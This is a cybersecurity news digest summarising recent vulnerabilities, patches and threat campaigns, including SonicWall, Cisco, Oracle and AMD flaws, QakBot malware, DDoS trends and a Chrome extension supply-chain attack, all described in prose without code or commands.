Daily Brief

SonicWall has issued a critical alert for a security vulnerability in its SMA 1000 series, identified as CVE-2025-23006. This flaw, with a severity rating of 9.8/10 on the CVSS scale, could allow unauthenticated remote attackers to execute arbitrary OS commands. The vulnerability specifically affects the Appliance Management Console (AMC) and Central Management Console (CMC) within the SMA 1000 appliances. SonicWall has addressed the issue in version 12.4.3-02854 (platform-hotfix) and urged customers to promptly apply this patch. There have been reports of possible active exploitation of this vulnerability in the wild. The vulnerability does not impact SonicWall's Firewall and SMA 100 series products. Microsoft Threat Intelligence Center (MSTIC) was credited with discovering and reporting the vulnerability. SonicWall recommends restricting access to the AMC and CMC to trusted sources to minimize potential impacts.

In 2024, Cloudflare countered 21.3 million DDoS attacks, marking a 53% increase from the previous year. A significant DDoS attack using a Mirai-variant botnet occurred close to Halloween, involving over 13,000 IoT devices and producing 5.6 Tbps of traffic. This attack, targeted at an Eastern Asian ISP, set a new record, surpassing the previous highest at 3.8 Tbps. Cloudflare's report highlights a rise in shorter DDoS attacks, with 72% lasting under ten minutes, making manual intervention challenging. Customers indicated competitors (40%), state-sponsored groups (17%), and disgruntled users (17%) as primary suspects behind attacks. There was also a noted increase in ransom-related DDoS attacks, with a 78% rise in incidents demanding ransom payments during Q4.

45% of third-party applications access sensitive user data without proper authorization, involving industries like retail where 53% of risk exposures are due to tracking tools. Reflectiz, a web exposure management firm, conducted research analyzing the top websites in various sectors, revealing substantial vulnerabilities. The prevalent misuse of tracking apps like Facebook and TikTok pixels leads to unauthorized collection of private user information. Entertainment and online retail sectors should critically assess third-party app permissions to minimize unnecessary sensitive data access and reduce risk. Less popular apps are considered higher risk, lacking robust security updates and community vetting, which could lead to compromised user data security. The report encourages industries to tailor their risk management strategies according to specific risk variables and contexts, using an innovative Exposure Rating technology. Business sectors such as education and publishing are advised to focus on training and adopting best practices, especially in departments likely to initiate risky exposures.

Cybersecurity experts revealed a new malware associated with the QakBot network, incorporating advanced DNS tunneling and remote access functionalities. Researchers discovered that the new BackConnect (BC) module was used alongside known malware like DarkVNC and IcedID, primarily to maintain persistence and manage command and control communications. This advanced BC module was detected on the same infrastructure that supports ZLoader, suggesting closely linked cybercriminal operations. Following the 2023 law enforcement intervention which disrupted QakBot's operations, subsequent analyses have shown that QakBot's framework continues to evolve, now including features to collect detailed system information. The BC malware functions as a standalone backdoor, offering attackers direct access and enabling them to collect system information for further exploits. Independent investigations by Sophos correlated the malware artifacts to specific cybercriminal groups known for sophisticated phishing and ransomware attacks. The intertwining of various criminal elements, such as the deployment of other malware types and the use of Microsoft services for phishing attacks, highlights a complex and collaborative cybercriminal infrastructure.

For the first time since the pandemic began, the number of new tech companies in the UK has decreased by 5% in 2024 compared to the previous year, demonstrating the sector's first contraction since 2020. This downturn is attributed to a combination of factors including high inflation, rising interest rates, and significant tax increases which have negatively impacted business confidence and economic conditions. The UK government is attempting to counter these challenges by leveraging AI technology and involving tech giants in regulatory processes, aiming to stimulate economic growth and productivity. The increase in corporation tax from 19% to 25% for companies with profits over £250,000 has placed additional financial strain on businesses, alongside scheduled hikes in National Insurance contributions. Significant declines in tech company formations were particularly noted in Wales and the southwest of England, with London also experiencing a drop for the first time in five years. The uncertainty and cautious outlook in UK tech boardrooms are also being fueled by external factors such as potential US policy changes and tariffs. The lack of immediate government plans surrounding AI investment details has left tech businesses in a state of uncertainty, contributing further to the challenging environment.

AMD's microprocessors have been identified with a microcode signature verification vulnerability. The issue came to light after Asus released a beta BIOS update that inadvertently included a fix for this vulnerability. Microcode manipulations, usually reserved for privileged processes, could potentially allow unauthorized code execution if exploited. Although not deemed highly critical, AMD is concerned about the potential for counterfeit patches and misinformation. The vulnerability requires local administrator access and specialized malicious microcode to be exploited effectively. AMD confirms ongoing development of official patches and advises adherence to standard security practices and trusted sources. AMD is coordinating with partners to deploy mitigations and plans to release detailed guidance and mitigation options soon. The exact AMD products affected are not yet disclosed, leading to some speculation in the cybersecurity community.

Cisco has patched a critical security flaw (CVE-2025-20156) in Meeting Management, allowing remote attackers administrative control, rated CVSS 9.9. Another vulnerability in Cisco's BroadWorks was fixed, preventing denial-of-service (DoS) attacks triggered by SIP request overloads (CVE-2025-20165, CVSS 7.5). Cisco also resolved an integer underflow issue in ClamAV that could lead to DoS conditions (CVE-2025-20128, CVSS 5.3). CISA and FBI released details on exploit chains used by nation-state actors targeting Ivanti's cloud services, involving multiple CVEs to gain network access and execute malicious activities. The disclosed exploit chains have been utilized for credential theft, remote code execution, and attempts to maintain persistence within compromised networks. Cisco's timely response with patches underscores the importance of rapid vulnerability management in critical network infrastructure. Enhanced vigilance and updated security measures are advised following these disclosures to prevent potential exploitation.

Google identified a financially motivated threat actor named TRIPLESTRENGTH targeting cloud environments for cryptojacking and on-premise ransomware attacks. The threat actor employs stolen credentials and cookies, partly from Raccoon malware, to access cloud instances like Google Cloud, AWS, and Microsoft Azure. TRIPLESTRENGTH uses these hijacked environments to mine cryptocurrencies using the unMiner application and the unMineable mining pool. Apart from cryptojacking, TRIPLESTRENGTH also engages in ransomware attacks on on-premise resources, using variants such as Phobos and LokiLocker. The group advertises access to compromised cloud servers on Telegram and recruits partners for further ransomware and extortion schemes. Google has responded by implementing multi-factor authentication (MFA) and improving logging to prevent such attacks and sensitive billing actions. The attacks demonstrate the significant risks associated with stolen credentials, leading to a cascade of unauthorized access and data breaches.

Oracle issued a significant update with 603 patches, including 318 for its own products and 285 for associated Linux code. Highlighted is a critical patch for CVE-2025-21556 in Oracle's Agile PLM Framework, rated 9.9 on the CVSS scale, allowing low-privileged network attackers significant access. Another urgent update addresses CVE-2024-45492 in the XML parsing library LibExpat, which impacts several Oracle products and recently had its severity rating increased to 9.8. The patch update also includes fixes for high-risk vulnerabilities in Oracle Communications, Financial Services, Middleware, and Oracle Analytics platforms. High-severity issues addressed include a use-after-free bug in Oracle Analytics and a critical remote exploitation flaw in the OPERA hotel management application. There were also numerous patches for Oracle’s JD Edwards, MySQL, and PeopleSoft platforms, targeting critical vulnerabilities that could enable data theft or system crashes. Additionally, Oracle improved security for its Linux distributions, releasing patches to address vulnerabilities in libraries like gstreamer1-plugins-base which had memory corruption risks.

Two critical vulnerabilities have been identified in the RealHome theme and Easy Real Estate plugins for WordPress, potentially allowing unauthorized administrative access. The vulnerabilities were discovered by Patchstack in September 2024, but InspiryThemes has not responded to the security notifications or released any fixes. RealHome theme is impacted by a flaw that permits unauthenticated users to register as administrators through flawed registration function security. The Easy Real Estate plugin flaw allows attackers to gain administrative access via the social login feature without proper email verification. Both flaws carry a high severity rating (CVSS 9.8) and pose significant risks of site takeover, data manipulation, and unauthorized access to sensitive data. Despite the release of three new versions of the plugins since their discovery, none have addressed these security concerns. Immediate mitigation includes disabling the affected plugins and restricting user registration to prevent exploitation. These vulnerabilities affect approximately 32,600 websites using the RealHome theme, underscoring the widespread risk to real estate platforms.

The Trump administration dismissed all members of key Department of Homeland Security cyber advisory boards early in its tenure. This decision included the disbandment of the Cyber Safety Review Board amidst active investigations into major cyber incidents impacting American infrastructure. The House Committee on Homeland Security, in its first hearing since Trump took office, heard from expert witnesses about significant vulnerabilities in America’s cyber defense against Chinese attacks. Experts testified that Chinese hackers have deeply penetrated American networks and are prepping for potentially destructive activities aligned with geopolitical conflicts, notably around Taiwan. Retired Rear Admiral Mark Montgomery highlighted the strategic cybersecurity threats from China, particularly through the Volt Typhoon operation aimed at crippling U.S. military mobilization capabilities. Witnesses also pointed out that these actions by China prelude a likely military conflict over Taiwan, predicted by Chinese leadership to escalate by 2027. The dissolution of cybersecurity advisory boards is seen as reducing America’s readiness to respond to or prevent future cyberattacks from foreign adversaries.

A security flaw in Cloudflare's CDN was discovered that exposes users' general location by sending images via chat apps like Signal and Discord. The vulnerability allows tracking within a 250-mile radius, not precise enough for street-level detail but adequate for determining a user’s region. Despite the location tracking not requiring any action from the user (termed a "0-click attack"), it raises significant privacy concerns, especially for journalists, activists, and others prioritizing anonymity. The method involves using a bug in Cloudflare Workers to route requests through specific data centers, then mapping responses to these locations. Originally, Cloudflare confirmed and resolved the issue, rewarding the researcher with $200, but the researcher later demonstrated continued viability of location tracking using a VPN. Both Signal and Discord have dismissed responsibility for the flaw, referring back to Cloudflare, which asserts users should disable caching if concerned. The precision of location tracking is higher in urban areas compared to rural settings due to the proximity and number of Cloudflare data centers.

Threat actors exploit news around Ross Ulbricht's pardon to distribute malware through a fake Telegram channel. Users tricked into running malicious PowerShell scripts under the guise of a captcha or verification system. Attackers employ the "Click-Fix" mechanism, disguising harmful scripts as security measures. CAPTCHA verification pages prompt users to execute PowerShell commands, leading to a ZIP file download containing the malware. The downloaded malware includes a potential Cobalt Strike loader, increasing the risk of remote system access and subsequent ransomware or data theft. The misuse of verified accounts on social platforms like Telegram channels to propagate the attack. Detailed instructions within the fake verification process are carefully worded to avoid raising user suspicions. General security advice includes scrutinizing any PowerShell commands copied from the internet, especially if they seem to obfuscate their function.

Sekoia has identified a supply chain attack impacting developers of Chrome browser extensions, affecting potentially millions of end users. Phishing tactics and OAuth abuses were employed to inject malicious code into the Chrome Web Store, compromising various popular extensions. Victims include companies like Cyberhaven, which detected unauthorized activities during the holiday season, linking the attack to a broader phishing campaign analyzed by Booz Allen Hamilton. A purposeful phishing operation targeted extension developers via emails posing as official Chrome Web Store communications, urging developers to click malicious links. Through the compromised developer accounts, attackers uploaded tainted versions of extensions such as Reader Mode, which admitted to a breach affecting around 300,000 users. Sekoia's investigation traced back the phishing campaign to similar attacks starting from 2023, utilizing domain names and infrastructure consistently linked to earlier incidents. Analysis suggests that this specialization in Chrome extension attacks could result in wide-scale harvesting of sensitive user data, as evidenced by compromised extensions collecting API keys and session cookies from major platforms like ChatGPT and Facebook for Business.

Cisco has issued security updates for a critical Denial-of-Service (DoS) vulnerability in ClamAV, identified as CVE-2025-20128. The vulnerability stems from a heap-based buffer overflow in the OLE2 decryption routine, allowing remote, unauthenticated attacks. Attackers could exploit this flaw by submitting a specially crafted file with OLE2 content, potentially halting the ClamAV antivirus scanning process. Despite the availability of proof-of-concept (PoC) exploit code, there have been no reported cases of active exploitations in the wild. Affected software includes the Secure Endpoint Connector for Linux, Mac, and Windows, which integrates with SIEM systems like Microsoft Sentinel. Cisco also addressed additional vulnerabilities in its products, including other DoS and privilege escalation issues in various software. The company reassures users that overall system stability remains intact, even if the vulnerability is successfully exploited.